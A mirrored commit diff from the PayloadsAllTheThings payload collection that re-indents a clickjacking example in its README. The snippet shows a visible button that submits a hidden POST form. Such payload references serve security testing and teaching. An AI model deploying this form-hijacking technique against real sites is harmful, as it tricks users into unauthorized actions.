gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

References updated for CORS CRLF CSV

Browse Source
This commit is contained in:
Swissky
2024-11-04 18:00:07 +01:00
parent 4dc409d31e
commit e138308d3d
7 changed files with 125 additions and 124 deletions
Download Patch File Download Diff File Expand all files Collapse all files

23
Clickjacking/README.md
View File

@@ -83,17 +83,18 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in
</form>
```
* Deceptive Interaction: When the user clicks the visible button, they are unknowingly interacting with the hidden form due to the invisible overlay. The form is submitted, potentially causing unauthorized actions or data leakage.
```html
<button onclick="submitForm()">Click me</button>
<form action="legitimate-site" method="POST" id="hidden-form">
<!-- Hidden form fields -->
</form>
<script>
function submitForm() {
document.getElementById('hidden-form').submit();
}
</script>
```
```html
<button onclick="submitForm()">Click me</button>
<form action="legitimate-site" method="POST" id="hidden-form">
<!-- Hidden form fields -->
</form>
<script>
function submitForm() {
document.getElementById('hidden-form').submit();
}
</script>
```
### Execution Methods